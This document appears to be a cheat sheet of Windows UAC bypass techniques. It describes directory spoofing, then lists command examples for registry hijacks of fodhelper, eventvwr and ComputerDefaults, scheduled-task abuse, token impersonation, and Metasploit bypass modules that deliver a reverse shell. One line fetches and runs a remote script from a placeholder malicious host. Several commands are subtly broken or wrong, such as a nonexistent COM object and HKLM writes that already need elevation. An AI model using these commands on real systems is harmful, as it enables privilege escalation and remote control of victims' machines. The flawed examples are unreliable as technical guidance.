Windows UAC Bypass Techniques
Bypassing User Account Control (UAC) by Spoofing Trusted Directories
Introduction
Welcome to a detailed exploration of an innovative method to bypass the User Account Control (UAC) in Windows 10 Build 17134. This article will discuss the structure and vulnerabilities of UAC, introducing a newly discovered bypass method. It is important to note that Microsoft does not consider UAC a security boundary, but it remains a critical layer for defense in depth. Here, I will share a technique that, although complex, reveals significant vulnerabilities within the Windows permission system.
What is UAC?
User Account Control (UAC) is a feature in Windows that helps prevent unauthorized changes to the system by requiring administrative privileges to be confirmed before performing actions that could affect the system's operation or change settings that affect other users. UAC prompts help prevent malware from performing privileged actions without the user's knowledge.
UAC Operation
When an action requiring elevated privileges is needed, UAC interacts with the user to confirm the operation. There are exceptions where some executables are pre-authorized by the system to run with elevated privileges without prompts, depending on specific security checks that verify the executable's integrity and authenticity.
UAC Bypass: The Directory Spoofing Technique
Requirement 1: Auto-Elevation of Privileges
appinfo.dll processes requests for privilege escalation through RPC calls, where it checks if the executable has an "autoElevate" key set to true in its manifest. If true, the executable is considered trustworthy for auto-elevation.
Requirement 2: Signature Verification
The executable must also pass a signature check using the WinVerifyTrust
function. This ensures that only applications signed by trusted entities can auto-elevate.
Requirement 3: Execution from a Trusted Directory
Finally, the executable needs to be located in a directory considered secure by the system, such as C:\Windows\System32
.
Bypass Strategy
The technique exploits the strict verification of trusted directories by manipulating paths. By creating a directory named "C:\Windows\ " (note the space), we can fool the initial path verification performed by Windows.
Bypass Implementation
Creating the Spoofed Directory: We use the
CreateDirectory
function with the "\?" prefix to bypass system naming restrictions and create the spoofed directory.Copying an Authorized Executable: We move an auto-elevating executable, such as
winSAT.exe
, to the fake directory.Executing the Executable: When
winSAT.exe
is run from the fake directory, the system performs the elevation of privileges as if it were from a trusted directory.
Scheduled Tasks Bypass
Description: This method involves creating a scheduled task that executes with elevated privileges, thus bypassing UAC.
Command Example:
# Create a scheduled task to run a PowerShell script with elevated privileges schtasks /create /tn "MyTask" /sc once /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Script.ps1" /st 00:00 schtasks /run /tn "MyTask" schtasks /delete /tn "MyTask" /f
Environment Variable Manipulation
Description: By modifying environment variables that Windows checks before executing certain trusted binaries, attackers can redirect these executions to malicious files.
Command Example:
# Temporarily modify the environment path to include a malicious directory set PATH=C:\Malicious;%PATH% start trustedbinary.exe
Event Viewer Bypass
Description: A classic technique where the Microsoft Management Console (MMC) related to the event viewer is hijacked to execute a malicious payload.
Command Example:
# Use eventvwr to execute a custom MMC snap-in reg add "HKCU\Software\Classes\mscfile\shell\open\command" /t REG_SZ /d "cmd.exe /c start C:\Path\To\Malicious\payload.exe" /f eventvwr.exe reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
Mock Folders Bypass
Description: Exploiting the way Windows handles file paths to trick the system into executing a malicious program from a mock system directory.
Command Example:
# Create a mock system folder and place a malicious executable disguised as a trusted system utility mkdir "C:\Windows \System32" # Notice the space after Windows copy C:\Path\To\Malicious\executable.exe "C:\Windows \System32\trustedutility.exe" start "C:\Windows \System32\trustedutility.exe"
Token Impersonation
Description: This method involves creating a token that has high privileges and then impersonating that token to perform elevated operations.
Command Example:
# Use Invoke-TokenManipulation from PowerSploit to impersonate a token Import-Module .\PowerSploit\Exfiltration\Invoke-TokenManipulation.ps1 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Bypass Using SilentCleanup
Description: This technique exploits the Windows "SilentCleanup" task, which runs with elevated privileges and does not prompt UAC.
Command Example:
# Place a malicious script in the location that SilentCleanup checks $mPath = "C:\Windows\Temp\custom\malicious.ps1" $triggerPath = "C:\Windows\System32\cleanmgr.exe" New-Item -ItemType Directory -Path "C:\Windows\Temp\custom" Set-Content -Path $mPath -Value "IEX (New-Object Net.WebClient).DownloadString('http://malicious.url/script')" schtasks /create /tn "CleanUpMalicious" /xml "C:\Windows\System32\Tasks\Microsoft\Windows\DiskCleanup\SilentCleanup" /tr $triggerPath schtasks /run /tn "CleanUpMalicious" schtasks /delete /tn "CleanUpMalicious" /f
UAC Bypass via ICMLuaUtil Elevated COM Interface
Malware Examples: DarkSide, LockBit, TrickBot
Description: This technique utilizes the ICMLuaUtil COM interface, which is often allowed to bypass UAC due to its elevated privileges.
Command Example:
# Create an instance of the ICMLuaUtil interface and execute a command $comObject = New-Object -ComObject "ICMLuaUtil" $comObject.ShellExec("cmd.exe", "/c start notepad.exe", "", "runas", 1)
UAC Bypass via ComputerDefaults Execution Hijack
Malware Examples: ClipBanker, Quasar RAT
Description: Hijacks the execution path of
ComputerDefaults.exe
to run malicious code with elevated privileges.Command Example:
# Hijack the executable path in the registry Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(Default)" -Value "cmd.exe /c calc.exe" Start-Process "ComputerDefaults.exe"
UAC Bypass via Control Panel Execution Hijack
Malware Examples: AveMaria, Trojan.Mardom
Description: Modifies registry keys associated with Control Panel items to execute malicious payloads.
Command Example:
# Redirect Control Panel item to execute malicious code Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "DelegateExecute" -Value "C:\Path\To\Malicious\payload.exe" Start-Process "control.exe"
UAC Bypass via DiskCleanup Scheduled Task Hijack
Malware Examples: RedLine Stealer, Glupteba
Description: Utilizes the Disk Cleanup task, which typically runs with elevated privileges, to execute malicious scripts.
Command Example:
# Place malicious script in Disk Cleanup task location schtasks /create /tn "CleanUpTask" /tr "C:\Malicious\script.bat" /sc once /st 00:00 schtasks /run /tn "CleanUpTask"
UAC Bypass via FodHelper Execution Hijack
Malware Examples: Glupteba, BitAT dropper
Description: Abuses the auto-elevation setting of
fodhelper.exe
to execute without UAC prompts.Command Example:
# Use fodhelper to bypass UAC New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "DelegateExecute" -Value "" Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(Default)" -Value "cmd.exe /c start powershell.exe -ExecutionPolicy Bypass -NoExit -Command 'Start-Process notepad.exe -Verb runAs'" Start-Process fodhelper.exe
UAC Bypass Attempt via Windows Directory Masquerading
Malware Examples: Remcos RAT
Description: This method involves creating a directory that masquerades as a system directory to trick Windows into executing a malicious payload.
Command Example:
# Create a masquerading Windows directory and execute a payload mkdir "C:\Windows \System32" echo "Malicious script" > "C:\Windows \System32\malicious.bat" start "C:\Windows \System32\malicious.bat"
Metasploit UAC Bypass
Description: Metasploit offers several modules specifically designed to bypass UAC, leveraging known vulnerabilities and techniques.
Metasploit Command Example:
# Use Metasploit to exploit UAC msfconsole use multi/handler set SESSION 1 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [YourLocalIP] set LPORT 4444 exploit use exploit/windows/local/bypassuac <--------> use exploit/windows/local/bypassuac_sluihijack set payload windows/x64/meterpreter/reverse_tcp <--------> use exploit/windows/local/bypassuac_fodhelper
This Metasploit module will attempt to bypass UAC on a target Windows machine to deliver a reverse shell to the attacker.
Silent Process Exit Bypass
Description: Uses the Silent Process Exit registry keys to execute arbitrary commands with elevated privileges without triggering UAC.
Command Example:
# Setting Silent Process Exit to execute a malicious payload reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v "ReportingMode" /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v "MonitorProcess" /d "C:\Path\To\Malicious\payload.exe" /f
App Paths Bypass
Description: Manipulates the application paths in the registry to redirect the execution of legitimate applications to malicious executables.
Command Example:
# Manipulate App Paths to redirect to a malicious executable Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\calc.exe" -Name "(Default)" -Value "C:\Path\To\Malicious\payload.exe" Start-Process "calc.exe"
Mocking Trusted Directories
Description: Involves creating directories that mock trusted paths to mislead the system into executing malicious files, thinking they are trusted applications.
Command Example:
# Create a mock directory and execute a malicious file mkdir "C:\Program Files\TrustedDir" copy "C:\Path\To\Malicious\file.exe" "C:\Program Files\TrustedDir\trustedapp.exe" start "C:\Program Files\TrustedDir\trustedapp.exe"
Conclusion
This UAC bypass method, while effective, highlights the need for ongoing revision of security policies and access control implementations by Microsoft. Sharing and understanding these techniques is crucial to strengthening defenses against attacks that seek to exploit gaps in seemingly robust security mechanisms.
References
Last updated